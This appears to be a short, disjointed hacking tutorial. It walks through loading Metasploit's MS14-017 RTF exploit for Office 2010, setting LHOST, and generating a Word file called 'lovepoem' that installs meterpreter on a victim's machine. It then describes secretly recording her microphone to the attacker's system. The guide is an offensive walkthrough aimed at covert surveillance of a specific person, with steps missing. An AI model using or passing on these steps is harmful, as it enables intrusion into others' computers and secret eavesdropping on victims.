Spying-Exploit by Filename
Spying-Exploit by Filename
The first step, of course, is to fire up Kali Linux. To be able to use any computer as a bug, the first step will be
to compromise the target computer.
As you can see, they have named it MS14-017. When we do a search in Metasploit for this
vulnerability/exploit, we find:
exploit/windows/fileformat/ms14_017_rtf
Now that we have found the proper exploit, let's load it into Metasploit by typing:
msf >use exploit/windows/fileformat/ms14_017_rtf
Once we have it loaded, let's type "info" to find more about this exploit.
Now, "show options."
As you can see, the option we need to fill is the FILENAME. In addition, note that this exploit works
only on Office 2010.
Next, set the LHOST. This is the IP of your system. This tells the payload who to call back when it is
executed by the victim.
Finally, simply type "exploit." This will create a Word file called "lovepoem" that will place the
meterpreter on her system that we can then connect to.
This will start the microphone on her computer and store the recorded conversations and sounds in
a file in the /root directory on your system. Of course, you can choose any directory to store these
recordings. Just make certain you have adequate hard drive space, as these files can become very
large. When you want to hear what was recorded, simply open the stored file on your system.
OTHER EXAMPLE
http://www.instructables.com/id/Hack-a-computer-on-your-network-with-kali-linux/